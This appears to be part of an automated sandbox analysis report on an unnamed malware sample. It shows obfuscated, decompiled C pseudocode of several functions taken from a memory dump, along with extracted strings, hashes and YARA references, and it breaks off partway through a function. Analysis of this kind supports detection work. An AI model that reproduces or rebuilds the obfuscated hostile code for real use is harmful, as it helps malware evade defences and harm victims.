y#, xrefs: 00253BBA
d&, xrefs: 00253950
jy, xrefs: 00253965
further updates are possible for the databases that use this logfile sequence. Please correct the problem and restart or restore , xrefs: 00253C38, 00253CE5
-(, xrefs: 002539DA
6j, xrefs: 002538CA
WU, xrefs: 00253B6E
:{M/, xrefs: 00253C70
/w, xrefs: 002538DF
$, xrefs: 002539FF
:{M/, xrefs: 00253DAD

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$further updates are possible for the databases that use this logfile sequence. Please correct the problem and restart or restore $jy$y#$$
API String ID: 2962429428-4125384310
Opcode ID: 29599565c77ffe057a297c8d997673b2b9c490083eca3b0e195cb5bba675dd5c
Instruction ID: 2123fd9617d362079330b58fc954f1050a2e0ba1fc18f22060c8f3fdcf3942ee
Opcode Fuzzy Hash: 29599565c77ffe057a297c8d997673b2b9c490083eca3b0e195cb5bba675dd5c
Instruction Fuzzy Hash: E4D12F715183818FE368CF21C489A5BBBF1BBC4358F108A1DF5DA862A0D7B98958CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002542DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002542DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0025A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00258C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002594DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00245FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0024F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0024F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00248736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00248736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0024F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00257830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x002542da
0x002542e4
0x002542eb
0x002542ef
0x002542f6
0x002542fd
0x00254304
0x00254305
0x00254306
0x0025430b
0x00254316
0x00254319
0x00254323
0x0025432e
0x00254330
0x00254338
0x0025433d
0x00254342
0x00254344
0x00254348
0x0025434d
0x00254355
0x0025435d
0x00254365
0x0025436a
0x00254372
0x0025437d
0x00254388
0x00254393
0x0025439b
0x002543a0
0x002543a8
0x002543b0
0x002543b8
0x002543c3
0x002543cb
0x002543d6
0x002543de
0x002543ed
0x002543f0
0x002543f4
0x002543fc
0x00254404
0x00254409
0x00254411
0x00254419
0x00254421
0x00254429
0x0025442e
0x00254433
0x0025443b
0x00254443
0x0025444b
0x00254453
0x0025445b
0x00254463
0x0025446e
0x00254479
0x00254484
0x00254494
0x0025449c
0x0025449f
0x002544a3
0x002544ab
0x002544b3
0x002544bb
0x002544c3
0x002544cb
0x002544d6
0x002544e1
0x002544ee
0x002544fd
0x00254500
0x00254504
0x0025450c
0x00254514
0x0025451c
0x00254524
0x0025452c
0x00254534
0x00254541
0x00254545
0x0025454d
0x00254555
0x00254568
0x0025456f
0x0025457a
0x00254582
0x00254587
0x0025458f
0x00254597
0x0025459f
0x002545af
0x002545b3
0x002545b8
0x002545c0
0x002545c8
0x002545d4
0x002545d9
0x002545df
0x002545e7
0x002545f4
0x002545f5
0x002545f9
0x00254601
0x00254609
0x00254611
0x00254616
0x0025461e
0x00254629
0x00254634
0x0025463f
0x00254647
0x0025464f
0x00254657
0x0025465f
0x00254667
0x0025466f
0x00254674
0x0025467c
0x0025468a
0x0025468e
0x00254696
0x0025469b
0x002546a3
0x002546ab
0x002546b3
0x002546bb
0x002546c3
0x002546cb
0x002546d0
0x002546d8
0x002546e0
0x002546f0
0x002546f5
0x002546fe
0x00254709
0x00254714
0x0025471f
0x0025472a
0x00254735
0x0025473d
0x00254748
0x00254750
0x00254758
0x0025475d
0x00254765
0x0025476d
0x00254778
0x00254780
0x0025478b
0x00254793
0x0025479b
0x002547a3
0x002547ab
0x002547b3
0x002547be
0x002547c9
0x002547d4
0x002547e0
0x002547e3
0x002547e7
0x002547ef
0x002547f6
0x002547fa
0x002547fa
0x002547ff
0x002547ff
0x00254805
0x00000000
0x00000000
0x0025480b
0x0025480b
0x00254939
0x0025494b
0x00254950
0x00254955
0x002549e0
0x002549e0
0x00000000
0x0025495b
0x00254966
0x0025496e
0x00254980
0x00254984
0x00254988
0x00000000
0x00254988
0x00000000
0x00254811
0x00254813
0x002548d7
0x002548fa
0x002548fd
0x00254902
0x00254a70
0x00254a70
0x00254a74
0x00000000
0x00254819
0x0025481f
0x002548a2
0x002548a9
0x00000000
0x00254821
0x00254827
0x00000000
0x00254aa3
0x00254833
0x00254877
0x0025487c
0x00254884
0x00000000
0x00254835
0x0025483b
0x00254a79
0x00254a7f
0x00254a81
0x002547ff
0x002547ff
0x00254805
0x00000000
0x00000000
0x00000000
0x00254805
0x00000000
0x002547ff
0x00254841
0x00254850
0x00254851
0x00254857
0x0025485c
0x00254862
0x00254868
0x0025486d
0x0025486d
0x00254871
0x00254871
0x00000000
0x00254871
0x00254862
0x0025483b
0x00254833
0x0025481f
0x00254813
0x00254aae
0x00254aae
0x00000000
0x00254990
0x00254996
0x00254a4d
0x00254a4e
0x00254a54
0x00254a59
0x00254a5f
0x00254a6b
0x00000000
0x00254a61
0x00254a61
0x00000000
0x00254a61
0x0025499c
0x002549a2
0x00254a10
0x00254a15
0x00254a19
0x00254a1e
0x00254a25
0x00254a2e
0x00254a33
0x00000000
0x002549a4
0x002549aa
0x002549d8
0x002549dd
0x00000000
0x002549ac
0x002549b2
0x00000000
0x002549b8
0x002549b8
0x00000000
0x002549b8
0x002549b2
0x002549aa
0x002549a2
0x00000000
0x00254996
0x002547ff

Strings

R.93, xrefs: 002548F0
R.93, xrefs: 002549A4
+^, xrefs: 00254463
l), xrefs: 00254355
dEH, xrefs: 0025473D
RESCDIR, xrefs: 00254852

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction ID: 55b2e13295566459145d88a5069db1450953669d74e421ba4a7a45da013d1be8
Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction Fuzzy Hash: BF0243725183819FE3A8DF24C48AA5BFBE1FBC4318F108A1DE5D996260D7B48949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002502C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002502C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0024F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0025AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0024B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00253E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00247F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00254F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x002502c3
0x002502c9
0x002502d3
0x002502db
0x002502e9
0x002502ea
0x002502ec
0x002502f1
0x002502f5
0x00250305
0x0025030b
0x00250313
0x0025031b
0x00250323
0x00250328
0x00250334
0x00250339
0x0025033f
0x00250347
0x0025034f
0x00250354
0x00250360
0x00250365
0x0025036b
0x00250373
0x0025037f
0x00250384
0x0025038a
0x00250392
0x0025039a
0x002503a3
0x002503a8
0x002503ae
0x002503b6
0x002503be
0x002503c6
0x002503ce
0x002503d6
0x002503de
0x002503e3
0x002503ef
0x002503f2
0x002503f6
0x002503fe
0x00250406
0x0025040b
0x00250413
0x0025041b
0x00250420
0x00250428
0x00250430
0x00250438
0x00250440
0x00250448
0x00250459
0x00250461
0x00250465
0x0025046d
0x00250475
0x00250485
0x00250489
0x00250496
0x00250499
0x0025049d
0x002504a5
0x002504b2
0x002504b6
0x002504be
0x002504c6
0x002504ce
0x002504d6
0x002504db
0x002504e3
0x002504eb
0x002504fb
0x002504ff
0x00250504
0x0025050c
0x00250514
0x0025051c
0x00250524
0x0025052c
0x00250534
0x0025053c
0x00250549
0x0025054c
0x00250550
0x00250554
0x0025055c
0x00250564
0x00250569
0x00250571
0x00250579
0x0025057d
0x0025058a
0x0025058e
0x00250596
0x0025059e
0x002505a6
0x002505ae
0x002505b6
0x002505ba
0x002505bb
0x002505bd
0x002505c1
0x002505c9
0x002505c9
0x002505d7
0x002506f4
0x002506fd
0x00250708
0x0025070f
0x00250711
0x00250713
0x00250719
0x0025071b
0x0025071b
0x00250715
0x00250715
0x00250717
0x00000000
0x00000000
0x00250717
0x00250713
0x002505dd
0x002505e3
0x0025068a
0x0025068e
0x00250692
0x00250697
0x0025069a
0x00000000
0x002505e9
0x002505ef
0x0025065f
0x00250663
0x00250668
0x0025066a
0x0025066d
0x00250670
0x00250676
0x00000000
0x00250676
0x002505f1
0x002505f7
0x00250610
0x0025061b
0x00250621
0x00250622
0x00250624
0x0025062a
0x00000000
0x0025062a
0x002505f9
0x002505ff
0x00000000
0x00250605
0x00250605
0x00000000
0x00250605
0x002505ff
0x002505f7
0x002505ef
0x002505e3
0x0025071f
0x00250728
0x00250728
0x002506a4
0x002506be
0x002506c3
0x002506c9
0x002506d0
0x002506d8
0x002506d8
0x002506de
0x002506e3
0x002506e6
0x002506e6
0x002506e6
0x00000000

Strings

Sq, xrefs: 002504A5
#,', xrefs: 002502DB
u^, xrefs: 00250347
#, xrefs: 00250373
Fj, xrefs: 002504CE
[, xrefs: 002503FE

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: 40806b94de2e2acbdfebccb9f74c728e6fbbe419965b72ffee982b5daa623340
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: 96B151725083819FE358CF64C88940BFBE2FBC4758F108A1DF495962A0D7B99A59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0024EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0024EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
